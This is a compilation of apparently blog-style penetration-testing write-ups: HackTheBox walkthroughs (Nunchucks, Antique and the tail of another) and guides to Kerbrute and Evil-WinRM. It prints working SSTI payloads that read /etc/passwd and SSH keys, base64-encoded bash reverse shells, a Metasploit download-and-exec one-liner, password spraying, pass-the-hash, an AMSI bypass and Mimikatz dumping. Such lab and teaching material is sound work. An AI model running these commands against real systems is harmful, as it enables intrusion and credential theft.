Once we convert our file, we can download it by clicking on download tab and it will be saved as results.txt in our download’s directory. After downloading the file, we checked the result and found that Convertio is vulnerable to Server-Side Template Injection (SSTI). If we get the sum of the given argument, then it is quite promising that server is vulnerable to SSTI. For example, we have given {{7*7}}in our payload and received 49 as sum of 7*7.

 A server-side template injection (SSTI) vulnerability occurs when user data is embedded directly in a template and then interpreted by the template engine. This allows attackers to inject arbitrary directives to manipulate the template engine.



Then we decided to check the users in the target system. The user file is available in the /etc/passwd file. SSTI works similar as Local File inclusion vulnerability, but it has different syntax which is available here:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

We created a new payload to read /etc/passwd file from the target system and repeated the same process.

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}



Then we uploaded it and converted it to text format as we did earlier.



This time we got /etc/passwd file contents of the target system. After having a closer look into the passwd file, we found a user svc_acc present there. Now, we can perform couple of attacks against the target such as SSH service bruteforce or retrieving id_rsa file from the target host. When SSH bruteforce failed, we decided to retrieve the id_rsa file from the user .ssh directory.



Server-Side Template Injection (SSTI) Exploitation

The id_rsa file is in the /home/svc_acc/.ssh directory named as id_rsa. With id_rsa private key we can log in as svc_acc user without password if the id_rsa key is not protected with password. Then we created another payload where we have given the file path of the id_rsa and saved it as payload.png.

{{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}



When we upload our new payload, it will read the contents of id_rsa key and save it as results.txt file. We retrieved the RSA key downloading converted file. Now, we have RSA key, so we are in the position try log in via SSH service with retrieved RSA key.


User Flag

We saved RSA key as key and given 600 file permission. RSA key works with 600 and 400 file permission. If we do not give permission, then it will throw some errors to establish connection with the remote host. 600 permissions means that only the owner of the file has full read and write access to it. Once a file permission is set to 600, no one else can access the file. We can give permission to file by chmod 600 <filename>.

chmod 600 key

Then we can log in to the target system using RSA key as svc_acc. As we are going to establishing connection to the target host, we must add -i and pass RSA key to authenticate.

ssh -i key svc_acc@10.129.227.134

After logging in to the target system we can grab user flag from the svc_acc home directory.

cat user.txt

Next, we need to escalate to privilege account, so we transferred linpeas.sh script to the target system /tmp directory as any user has full permission on this directory. To transfer linpeas.sh into the target system we have to setup a python server in kali machine. Here we have set up python server on port 80, now we can download script with wget from target side.

In Kali:

python3 -m http.server 80

On Target:

wget 10.10.14.31/linpeas.sh 

Once it is downloaded in the target system, we will give full permission to the linpeas.sh and execute it. Script will enumerate possible privilege escalation vectors present in the target system.

chmod  777 linpeas.sh

./linpeas.sh



Privilege Escalation

Privilege escalation is the process of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be used by attackers to gain access to more system functions and data than intended by the root user. In some cases, privilege escalation can allow attackers to gain complete control of the system.

Find Privilege Escalation Vectors

After reviewing the linpeas.sh output, we found that the current user has an ownership permission on the ssh-alrert.sh script. We can perform various attacks if the file is writable by low privileged user and owned by root user. Before coming into any conclusion, lets enumerate what script does.



Escalate Privilege via owned file set to cron job

The script must be running as cron job, that means it is automated to perform some tasks on events or set for some jobs.  For example, when someone try to log in via SSH then it will send an alert to root user. We have ownership of the script but unfortunately, we cannot modify it.



Root Flag

Being an owner of the script, we can append anything on the script, which means we cannot delete or modify existing contents, but we have privilege to add more in it. So, if script executed by root next time it will also execute the task we have added.

Let’s append /bin/bash binary and give SUID permission. Now if we log in via SSH service then it will create a bin/bash binary in svc_acc home directory with SUID set. If we execute it, then it will spawn a root shell. Once we get root shell then we can grab root flag from /root/root directory.


Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, Server-Side Template Injection vulnerability assessment and exploitation, file transfer, file permissions, cron script analysis and performed privilege escalation by exploiting file permission and cron job.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

 

Nunchucks HackTheBox Walkthrough

0
0

Summary

Nunchucks is Linux machine and considered as easy box by the hack the box. On this box we will begin with basic port scan and move laterally based on findings. Then we will enumerate HTTP service and hunt vulnerabilities present in the web page.  Laterally, we will exploit server-side template injection (SSTI) vulnerability to gain an initial foothold into the target system. Then we will exploit Perl capabilities to gain root shell.

Table of content

Initial Access

  • Nmap TCP Port Scan

  • Web Page Enumeration

  • Directory Bruteforce

  • Vulnerability Assessment

  • Server-Side Template Injection Exploitation

  • User Flag

Privilege Escalation

  • Find Privilege Escalation Vectors

  • Escalate Privilege exploiting Perl capabilities

  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

Nmap TCP Port Scan

We begin with the port scan where we are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. To perform port scan, we have used -sV and -sC flag which performs a service version with default NSE scripts against the target machine.

Flags features:

-sV   :  Attempts to determine the service version

-sC   : Scans with default NSE scripts

 

nmap -sV -sC 10.129.30.114

From the nmap scan, we have found there were only three ports open, which is port 22,80 and port 443. As usual HTTP and HTTPS service is running on port 80 and 443 and SSH service is running on port 22.  HTTP and HTTPS service is used for the webhosting where SSH service is used for remote connection. We did not find any vulnerabilities on SSH version 8.2p1 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Furthermore, it is hosted on nginx 1.18.0, and we can see that port HTTP is redirecting to HTTPS. Also, we found domain name which is nunchucks.htb.

 



We addednunchucks.htb to our /etc/host file for further analysis.



Web Page Enumeration

We enumerate port 443 and accessing it over the bowser shown an online shopping website which comes with ecommerce features. Nothing looks interesting here in the web page, so we decided to go with the subdomain fuzzing as we already have target domain name.

 



Directory Bruteforce

We used wffuz tool to find any potential subdomains as the webpage is related to online shop, there is high chances to find other subdomains which is working with primary domain. Here we are using common wordlists and set --hw flag to hide responses with the specified words. If we do not use this flag, then we will get a lengthy output. Then se set fuzzing point on the domain which comes before the domain name. As expected, we found a subdomain store.nunchucks.htb.

wfuzz -c -w /usr/share/wordlists/dirb/common.txt -t30 --hw 2271 -H "Host:FUZZ.nunchucks.htb"https://nunchucks.htb/

 


Next, we added subdomain into the /etc/hosts file in our attacking machine to enumerate further. You can use any text editor to add domain to hosts file.


Vulnerability Assessment

After adding it into the hosts file, we accessed https://store.nunchucks.htb over browser and we got a new web page. The webpage looks like normal as other web pages. We checked source code and all available page but did not find anything interesting there. Then we went to main page and saw a user input field which is made to receive notifications. If we give our email address on the “Your email here” field, then we will receive notification from the https://store.nunchucks.htb but we do not want that. Our primary goal is to find vulnerabilities here.

 



We used a random email and captured the request to check how it works. We can see our email in the email field.



Then we decided to test Server-side Template Injection against the target system. To do that we sent the request to the repeater then replaced the random email with SSTI payload.

{{7*7}}



After sending request to the webpage, we received response as sum of the payload which is 49. If we get the sum of the given argument, then it is quite promising that server is vulnerable to SSTI. For example, we have given {{7*7}}in our payload and received 49 as sum of 7*7.

 A server-side template injection (SSTI) vulnerability occurs when user data is embedded directly in a template and then interpreted by the template engine. This allows attackers to inject arbitrary directives to manipulate the template engine.

Server-Side Template Injection (SSTI) Exploitation

Then we decided to check the users in the target system. The user file is available in the /etc/passwd file. SSTI works similar as Local File inclusion vulnerability, but it has different syntax which is available here:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

We created a new payload to read /etc/passwd file from the target system and repeated the same process.

"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('cat /etc/passwd')\")()}}"



After crafting new payload, we sent the request using bur repeater as we did it earlier. As expected, we got /etc/passwd contents in our response.



Next, we decided to take a reverse shell of the target system by send one liner bash reverse shell. Most of the reverse shell is available in the pentestmonkey website:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

As many times hard coded reverse shell does not work properly so we are encoding it to base64.

echo 'bash -c "bash -i >& /dev/tcp/10.10.14.30/443 0>&1"' | base64



Then we crafted our payload again and added our base64 encoded bash one liner reverse shell and replace new payload in the email field. Please note in the payload we issued -base64 -d flags, so when we send our encoded payload to the target system then it will decode it and execute with bash.

"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMC80NDMgMD4mMSIK | base64 -d | bash')\")()}}"

 



Once we replace new payload then follow the same steps we did earlier while retrieving from /etc/hosts file. Before sending it, let start netcat listener in our kali system on port 443.

nc -lvp 443

User Flag

After sending request to the web server, we received a reverse shell as user davidon port 443. We can grab our user flag from the david home directory.

cd /home/david

cat user.txt



Privilege Escalation

Privilege escalation is the process of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be used by attackers to gain access to more system functions and data than intended by the root user. In some cases, privilege escalation can allow attackers to gain complete control of the system.

Find Privilege Escalation Vectors

Next, we need to escalate to privilege account, so we transferred linpeas.sh script to the target system /tmp directory as any user has full permission on this directory. To transfer linpeas.sh into the target system we have to setup a python server in kali machine. Here we have set up python server on port 80, now we can download script with wget from target side.

In Kali:

python3 -m http.server 80

On Target:

cd /tmp

wget 10.10.14.30/linpeas.sh 


Once it is downloaded in the target system, we will give full permission to the linpeas.sh and execute it. Script will enumerate possible privilege escalation vectors present in the target system.

chmod  777 linpeas.sh

./linpeas.sh



From the linpeas.sh out we found that Perl has special capabilities which can lead an attacked to gain high privileged shell which is root shell. Please note, if linpeas output is highlighting red and yellow both area then that could be promising to gain root access in the target system.

 



Escalate Privilege via Perl capabilities

We have got an insight about the potential exploit so started checking blogs and techniques on google. We found there is an article available in the “Hacking articles” about exploiting Perl to gain root shell. Referencing the article, we created a bash script and saved it as test.sh in our kali machine and sent it to the target system as we transferred file earlier in linpeas.sh case.

https://www.hackingarticles.in/linux-for-pentester-perl-privilege-escalation/

In Kali:

python3 -m http.server 80



Root Flag

We download test.sh script on target /tmp directory and give full permission. Execution of the script spawned a root shell. Now we can grab our root flag from the /root directory.

On Target:

cd /tmp

wget 10.10.14.30/test.sh 

chmod  777 test.sh

./test.sh

 


Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, Server-Side Template Injection vulnerability assessment and exploitation, file transfer, special capabilities, and performed privilege escalation by exploiting Perl capabilities.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Antique HackTheBox Walkthrough

0
0

Summary

Antique is Linux machine and considered as easy box by the hack the box. On this box we will begin with basic port scan and move laterally based on findings. Then we will enumerate telnet service and hunt vulnerabilities present on particular version.  Laterally, we will exploit password disclosure vulnerability and obtain plain taxed password. Then we will be tasked to gain root access where we will need to perform port forwarding then we will read sensitive file by exploiting file read vulnerability present on CUPS 1.6.1 version. In addition, we will be exploiting privilege and port forwarding using two different techniques.

Table of content

Initial Access

  • Initial Nmap TCP Port Scan

  • Telnet Banner Grabbing

  • Searching for the exploit

  • SNMP Enumeration

  • User Shell

  • User Flag

Privilege Escalation

  • Port Forwarding with Metasploit

  • Finding Privilege Escalation Vectors

  • Exploit File read Vulnerability

  • Root Flag

  • Manual Method

·         Port forwarding with chisel

·         Root flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

Initial Nmap TCP Port Scan

We begin with the port scan where we are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. To perform port scan, we have used -sV flag with full TCP ports against the target system which will scan full TCP ports with service version.

Flags features:

-sV   :  Attempts to determine the service version

-p-  :  Attempts to scan full ports

 

nmap -p- -sV 10.129.33.36

From the nmap scan, we have found telnet is open. Telnet is used to make remote connection. Many of the telnet version are vulnerable and it is not secured protocol because it does not follow any encryption while communicating and transferring any message from one end point to another.

 



 

Telnet Banner Grabbing

While banner grabbing, it shown a HP JetDirect and prompt for the password. By its name it looks like printer service which is managed by telnet protocol. Many times, administrators use common password for the printers but did not work in our case.



Searching for the exploit

When we searched for the exploit related to HP Jet Direct, we found one exploit available which has vulnerability to disclose the device password. We downloaded the exploit and checking the source code we found it works with SNMP protocol.  If we get device password, then we can enumerate device via telnet using credentials. But it is only possible if SNMP protocol is open.

searchsploit HP JetDirect

searchsploit -m 22319

cat 22319.txt



 SNMP Enumeration

This time, we are scanning only SNMP Service which is works on its default port 161 and follows UDP protocol.From the nmap scan result, we found that SNMP port is open and community name is public which is very common. Also, we found it is using SNMP version 1 which is an insecure version as it does not follow encryption.

Flags features:

-sU   :  Attempts to scan UDP ports

-sV   :  Attempts to determine the service version

-p :  Attempts to scan against given port

nmap -sU -sV -p 161 10.129.33.36

 


Next, we are following the exploit we found earlier which gave us some decimal values.  Here we have given target IP address which is 10.129.33.36.

 snmpget -v 1 -c public 10.129.33.36 .1.3.6.1.4.1.11.2.3.9.1.1.13.0



Then,we copied all decimal contents and decoded using cyberchef. Cyberchef is an online tool used to encode and decode. After decoding we got a plain taxed password: P@ssw0rd@123!!123

Reference link: https://gchq.github.io/CyberChef/



User Shell

With obtained credentials, we logged in to telnet and used help command (?). There we saw , we can use exec command which means we can execute any system commands from here.



Then we used Metasploit script web delivery module where it will create server and send payload to receive reverse shell and once server started, we will use python reverse shell. Execution of the reverse shell will give us a meterpreter session. To do that we have to provide srvhost IP address and local host IP address and listening port, but we can skip lport as Metasploit picks it by itself and its default listening port is 4444. Please note, both srvhost and local IP address are same of our kali machine IP address.  For more information about this module is available here:

https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery/

use multi/script/web_delivery

set lhost 10.10.14.93

set srvhost 10.10.14.93

exploit

python3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.10.14.93:8080/CzrKiV54o7', context=ssl._create_unverified_context());exec(r.read());"



 

User Flag

As we can see we have received a meterpreter shell. Now we can grab user flag /var/spool/lpd directory. Also, if the meterpreter session is established then we can interact with session number, here it is 1. Further enumeration of the internal network, we found an internet printing protocol is running on its default port 631.

 



Privilege Escalation

Privilege escalation is the process of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be used by attackers to gain access to more system functions and data than intended by the root user. In some cases, privilege escalation can allow attackers to gain complete control of the system.

Port Forwarding with Metasploit

To enumerate the port 631, we will forward its port to our kali system so it will be accessible from there.  Here we have the port number we want to access in our kali loopback interface and the port number we want to forward to our kali system which is 631.

portfwd add -l 8082 -p 631 -r 127.0.0.1





Finding Privilege Escalation Vectors

Accessing it over browser from our kali, opened a web page where we found CUPS version 1.6.1.



Exploit File read Vulnerability

The CUPS version 1.6.1 is vulnerable to root file read. We found a Metasploit module is also available there. Then we switched to module where we provided current session ID, and the file name that we want to read, where we have given root.txt.

use post/multi/escalate/cups_root_file_read

set session 1

set file /root/root.txt



Root flag

After execution of the exploit, it will save output to /root/.msf4/loot directory. There we can use cat command to view the contents of roo.txt. Now we can submit the root flag.

 



Manual Method

Let’s try with manual way, we will exploit root file read vulnerability from port forwarding. In many exam settings, we are not allowed to use automated tools, so we also need to consider working on manual way as well.

Port forwarding with chisel

For the port forwarding we need to download chisel and transfer it to target machine. Chisel is great tool used for pivoting and it is used by many penetration testers during their internal assessments. Make sure to download amd64 architecture only.  The download link is given below:

https://github.com/jpillora/chisel

 



Once it download, we will unzip it and turn on python server on port 80 to transfer it to the target system.

gunzip chisel_1.7.7_linux_amd64.gz

python3 -m http.server 80



We also need to set a chisel server on our kali system to make them communicate with each other. Firstly, we need to give full permission to execute. Next, we will set up a chisel server on port 5000.

chmod 777chisel_1.7.7_linux_amd64.gz

./ chisel_1.7.7_linux_amd64.gz server -p 5000 --reverse

 



Then we will take a reverse shell after authenticating via telnet with obtainedpassword: P@ssw0rd@123!!123. After logging in to telnet we will take reverse shell using exec command, here we are using bash one liner reverse shell. Do not forget to turn on netcat listener on port 1234 before executing bash one liner.

On kali terminal 1:

telnet 10.129.33.36

On kali terminal 2:

Nc -nlvp 1234

On kali terminal 1:

exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/1234 0>&1'



Next, we will download chisel in the target systems /tmp folder.

wget 10.10.14.93/chisel_1.7.7_linux_amd64



Once we download chisel on target system. We will give full permission so we can execute it. Here we need to provide few details to set up chisel client such as attacker Ip address (10.10.14.93), attacker side chisel server port (5000), remote port (5432) where we want to access service then local host and local internal port (631) that we wish to forward.

./chisel_1.7.7_linux_amd64 client 10.10.14.93:5000 R:5432:localhost:631



Once we forward the port then we can access it from kali over browser on loopback IP or localhost on port 5432.

 



Root Flag

When we checked groups, we found that current users belong to lpadmin group. As cups is accessible from the kali browser, here we are changing error log path to /root/root.txt.  Once we do that, we can check root.txt file over browser. Before changing error log path, we could be able to see only error logs on browser but after changing its path we will be able to read any files we wish to read.



The error logs stored in the /admin/log directory. Checking error log over browser, we got root.txt content instead of any error. Now we can submit the root flag.



 

Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, UDP port scan, SNMP enumeration, exploit password disclosure vulnerability, port forwarding (Metasploit), Port forwarding (manual), file transfer, file permissions, exploit file read vulnerability to read root.txt file in two different ways.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

 

A Detailed Guide on Kerbrute

0
0

Background:

Kerbrute is a tool used to enumerate valid Active directory user accounts that using kerrberos pre-authentication. Also, this tool can be used to password attacks such as password bruteforce, username enumeration, password spray etc. This tool is being used for many years by penetration testers during internal penetration testing engagements. This tool is originally written by Ronnie Flathers (ropnop) with contributor Alex Flores.

Table of content:

  • Introduction to Kerberos authentication

  • Download Kerbrute

  • Kerbrute help – List available features

  • Find valid users / User enumeration

  • Kerbrute Password Spray

  • Password Bruteforce

  • Bruteforce username:password combos

  • Saving Output

  • Verbose mode

  • Mitigation

  • Conclusion

 

Introduction to Kerberos authentication

The Kerberos service run on its default port which is 88 in a domain controller system. This service come in windows and the Linux system as well where it is used to implement authentication process more securely in an Active directory environment. For more information about Kerberos authentication process and service principal name (SPN) please consider visiting the below link:

https://www.hackingarticles.in/deep-dive-into-kerberoasting-attack/

 

Download Kerbrute

Kerbrute can be downloaded from its official github repository release page. It was last modified in December 2019. The source code of the tool is also available, and it is also available for windows system and other Linux architecture. For the simplicity, we will download compiled kerbrute_linux_amd64 for the kali Linux which will be going to be an attacking system for the demonstration. The tool can be downloaded from link given below.

Download link:

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3

 


Kerbrute help – List available features

Once we download tool in kali machine, we can list the available options and feature by executing following command:

./kerbrute_linux_amd64

In the picture below, we can see that tools can perform various tasks such as bruteforce, bruteuser, password spray, userenum and version detection. Moreover, there are some flags available too which can be very handy during penetration testing.  During the internal assessment, many times we encounter security features and the password policy so increasing and decreasing threads can help us to make password attack stealthier. We highly recommend using all available flags comes with kerbrute to get practical experience and analyse the results.



Find valid users / User enumeration

During the internal penetration testing engagements especially in Active Directory environment, our initial goal is to find valid users. Once we find potential users from the company website or any other sort of misconfiguration then we can verify those users if they have valid accounts or not using kerbrute.  To do that, we will make a list of potential users that we obtained from OSINT or any other way. For the demonstration, we have created a user’s lists and saved it as users.txt.



Then we provided users list and selected userenum option. Next we provided domain controller IP address and domain name which is ignite.local in our case. The tool will test against each user account and verify if those users exist in the domain and using Kerberos pre-authentication.  In the picture below we can see that kapil, aarti, shreya, raj and pawan appeared as valid users using Kerberos authentication. Here we in the position where we can think about various Kerberos attack such as SPN and Kerberos bruteforce etc. To reproduce the proof of concept, feel free to use below command.

./kerbrute_linux_amd64 userenum --dc 192.168.1.19 -d ignite.local users.txt



Kerbrute Password Spray

Suppose we have obtained a password (Password@1) during enumeration phase that can be anything such as OSNIT leaked password, service misconfiguration, smb share, ftp etc but we do not know the real owner of the obtained password. In the username enumeration phase, we found five valid users now we can test obtained password with their accounts. Password spray is like password bruteforce where we test each password against single users but in the password spray, we use single password and test it against all valid accounts.  To do that, we created a new users list and saved it as users.txt. Then we used passwordspray option this time and provided domain controller IP address and domain name along with valid users list and obtained password. In the picture below, we can see that three users account matched with the obtained password. Now we can try log in via rdp, winrm and smb service. To reproduce the proof of concept, please consider following below command.

./kerbrute_linux_amd64 passwordspray --dc 192.168.1.19 -d ignite.local users.txt Password@1



 

Password Bruteforce

Next, we will try password bruteforce using potential passwords against single user. In the password bruteforce we test all potential password against single user. Here we are using common password list where you can try with different password list to get expected result. Password mutation, or custom wordlist can be fruitful whenever we come across internal penetration testing. We highly recommend visiting our article to get familiar yourself with password mutation using crunch utility by visiting below link.

https://www.hackingarticles.in/a-detailed-guide-on-crunch/

Firstly, we will create a potential password to perform bruteforce attack against the domain.



We have created a password list and saved in as pass.txt Then we are used bruteuseroption this time and provided domain controller IP address, domain name and potential password list and username ( aarti).  Tool will show + sign when it triggers with the valid password. If you are in the real-world engagement, then be careful about the account lockout policy because it may affect our client business. It is very common to experience this problem during penetration testing and you might need to wait for 30 minutes to one hour to perform the attack again or  sometime system administrator need to unlick it manually. Usually, it locks out account after 5 attempts, but few companies set it at 3 attempts as well. In the picture, we can see that user aarti’s password matched with one password from the password list we provided. Now, we can use valid credentials to log in via RDP, psexec and evil-winrm. To reproduce the proof of concept then follow the below command.

./kerbrute_linux_amd64 bruteuser --dc 192.168.1.19 -d ignite.local pass.txt aarti



 

Bruteforce username:password combos

In this example, we will create a combined username and password list and attempt to verify if they matched. To do that, we created username and password list and saved it as userpass.txt and attempt to verify using pipe (|)along with ( - ) flag. Here we have provided userpass list, domain controller IP address and the domain name as we did in the earlier attacks. Execution of the command verified two user accounts. To reproduce the proof of concept then feel free to repeat the process with below command.



cat userpass.txt | ./kerbrute_linux_amd64 --dc 192.168.1.19 -d ignite.local bruteforce -



Saving Output

Saving output is always healthy whether we are solving CTF or in the real word engagements. If we save output, then we do not have to run command again and again to check the results. Also, it is beneficial specially in the real-world project where we have to provide output to our clients in the penetration testing reports. We can save output of our finding using -o flagproviding output file name. In this example, we have saved output as result.txt. To reproduce the proof of concept, follow the below command where we append -o flag in previously used command.

 ./kerbrute_linux_amd64 userenum --dc 192.168.1.19 -d ignite.local users.txt -o result.txt



 

Verbose mode

We can also use verbose mode using -v flag in our command. Verbose features give us insight about the tool doing with each user account. Here in the below example, we can see that when kerbrute in unable to verify Kerberos account, it is showing user does not exist. In this example we are attempting to perform username enumeration by using same command we used during username enumeration phase by appending -v flag to get verbose result. To reproduce the proof of concept, feel free to test below command.

./kerbrute_linux_amd64 userenum --dc 192.168.1.19 -d ignite.local users.txt -v

 



Mitigation

There are multiple factors and ways which can help to hardening the system.

1. Hacking article recommends following strong password policy and recommends avoiding using common passwords.

2. Hacking article recommends applying account lockout policy to mitigate with brute force attack.

3. Hacking article recommends using two-factor authentication: Two-factor authentication should be used for all user accounts.

4. Hacking article also recommends to the organisations to educate employees about the potential threat and attacks by providing monthly awareness program.

5. Hacking article also recommends conducting penetration testing assessment twice a year.

 

Conclusion:

We have explored kerbrute tool briefly and its special features which can allow an attacker to gain access into the internal network. We have explored multiple techniques to exploit internal network using kerbrute tool where we performed password spray, password bruteforce and userenum etc. Lastly, we also provided the steps to mitigate these attacks. I hope you have learned something new today. Happy hacking!


A Detailed Guide on Evil-Winrm

0
0

Background:

Evil-winrm tool is originally written by the team Hackplayers. The purpose of this tool is to make penetration testing easy as possible especially in the Microsoft windows environment. Evil-winrm works with PowerShell remoting protocol (PSRP). System and network administrators often use Windows Remote Management protocol to upload, edit and upload. WinRM is SOAP-based, and firewall friendly protocol works with HTTP transport over the default HTTP port 5985. For more information about the PowerShell remoting, consider visiting Microsoft official site.

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3

Table of Content:

  • Introduction to Evil-winrm

  • Winrm Service Discovery

  • Evil-winrm Help – List Available Features

  • Login With Plain Texted Password

  • Login with Plain Texted Password – SSL Enabled

  • Login with NTLM Hash -Pass The Hash Attack

  • Load Powershell Script

  • Store logs with Evil-winrm

  • Disable Remote Path Completion

  • Disable Coloured Interface

  • Run Executables File

  • Service Enumeration with Evil-winrm

  • File Transfer with Evil-winrm

  • Use Evil-winrm From Docker

  • Login with key using Evil-winrm

  • Conclusion

 

Introduction to Evil-winrm

Evil-winrm open-sourced tool written in ruby language making post exploitation easy as possible. This tool comes with many cool features which includes remote login with plain texted password, SSL encrypted login, login with NTLM hash, login with keys, file transfer, logs store etc. The authors of the tool keep updating this tool and adding many new features which made Internal assessment easier. Using evil-winrm, we get a PowerShell session of the remote host. This tool comes with all modern Kali Linux but if you wish to download then you can download it from its official git repository.

Download Link: https://github.com/Hackplayers/evil-winrm


Winrm Service Discovery

As we have discussed earlier that the evil-winrm tool is used if the Winrm service is enabled in the remote host. To confirm, we can look for the two default winrm service ports 5895 and 5896 is open or not using nmap. From the nmap result, we found that winrm service is enabled so we can use evil-winrm to log in and perform other tasks which we are going to explore in the lateral phases.

nmap -p 5985,5986 192.168.1.19



Evil-winrm Help – List Available Features

Many penetration testers and the CTF players have used this tool quite often during internal assessments but still many of us are unaware about the tool’s extra features which can make our assessment much easier than ever.  To list the all-available cool features of the evil-winrm, we can simply use -h flag and that will list all the help commands with descriptions.  We are going to cover as much as possible in this article and encourage everyone to play with other features as well.

evil-winrm -h



Login With Plain Texted Password

Suppose we have obtained a plain texted password during enumeration phase, and we noticed that winrm service is enabled in the remote host. Then we can take a remote session on the target system using evil-winrm by issuing IP address of the remote host with -i flag, username with -u flag and the password with -p flag. In the below picture, we can see that it has established a remote PowerShell session.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987



Login with Plain Texted Password – SSL Enabled

As we have mentioned earlier that the winrm service transports traffic over HTTP protocol then we can use Secure Socket Layer (SSL) feature to make connection secure. Once we enable SSL feature then our data will be delivered over an encrypted secure socket layer. With evil-winrm we can achieve the objective using -Sflag along with our previous command that we used to establish connection to the remote host.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

 



Login with NTLM Hash -Pass The Hash Attack

During the internal assessment or solving any CTF related to windows privilege escalation and Active Directory exploitation, we often get NTLM hash by using our exploits and the attacks. If we are in the windows environment, we can utilise evil-winrm to establish a PowerShell session by performing pass the hash attack where we issue hash as a password instead of using plain texted password. Apart from that, this attack also supports other protocols as well. We can pass the hash using -H flag along with the command we used earlier replacing password section with hash. More detailed guide about the pass the hash attack is available in the below link:

https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38



Load Powershell Script

Evil-winrm also come up with a feature which allows us to use scripts from our base machine. We can directly load scripts directly into the memory using -sflag along with the script file path where we have stored scripts I our local macine. Furthermore, it also come up with AMSI feature which we often required before importing any script. In the below example, we are bypassing AMSI then directly calling Invoke-Mimiktz.ps1 script from our system to target machine and loading it into the memory. After that, we can use any mimikatz’s command. For the demonstration purpose, here we have dumped credentials from the cache. After dumping credentials, we can perform pass the hash attack with obtained NTLM hash again. Follow the steps below to reproduce the attack with evil-winrm.

https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1



evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell

Bypass-4MSI

Invoke-Mimikatz.ps1

Invoke-Mimikatz



Store logs with Evil-winrm

This feature is designed to the save logs to our local system while performing enumeration after getting remote session. When we are playing CTF or in the real-time internal penetration testing engagement, we need to keep references for the reporting. Evil-winrm gives that freedom to save all logs into our base machine using -l flag. We can take any remote session using evil-winrm and add -l flag so it will save all the logs to our base machine in /root/evil-winrm-logs directory with date and IP address which can be used later for the references. In the below example, we have used ipconfig command and the output of the command saved in our base machine at the same time.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l



We can verify it by checking saved logs contents, you will notice it has captured the screenshot of the terminal where we used ipconfig command.



Disable Remote Path Completion

By default, it come with the remote path completion feature but if we wish to disable remote path completion then we can add -N flag along with our command. It depends on individuals whether they prefer auto-completion feature on or off but if you are comfortable with auto-completion then feel free to go with its default function.

 evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N



Disable Coloured Interface

Whenever, we establish any remote session using evil-winrm, it spawns a beautiful, coloured command line interface but if we wish to disable coloured interface then we can also do that using -nflag along with our command while establishing session.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n



Run Executables File

This feature is designed to tackle real-time problem and difficulties we faced during the assessment when we have a PowerShell session, and we cannot drop it to command line. In such scenarios, we wish if we could run exe executables in the evil-winrm sessions. Suppose we have an executable that we want to run in the target system.



 Hackplayers team designed this tool again and added an additional feature where we can run all executables like charm while in the evil-winrm PowerShell session. Similarly, as we used -s flag to execute PowerShell scripts path, this time we use -e flag to execute exe executable binaries. In the below example, we are issuing a path whereWinPEAS.exe executable is stored in the local machine and running it using additional feature (Invoke-Binary) from evil-winrm menu. This feature allows us to execute any exe binaries that usually run in the command line shell.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc

Bypass-4MSI

menu

Invoke-Binary /opt/privsc/winPEASx64.exe



Once we set a executables path then we can use any executable that we wish to run into the target system. In the below example, we are calling WinPEASx64.exe and running it into the target system with evil-winrm. As we can see, it is working fine as expected.



Service Enumeration with Evil-winrm

Sometime many post exploitation enumeration tools fail to detect the service name that is running in the target system. In that scenario, we can use evil-winrm to find the service names running in the target system. To do that, we can again go to menu and use services feature. It will list all the services running into the compromised host. This feature can be very handy, when we see there is any unquoted service installed in the target system and other post exploitation tools failed to identify the service name.



File Transfer with Evil-winrm

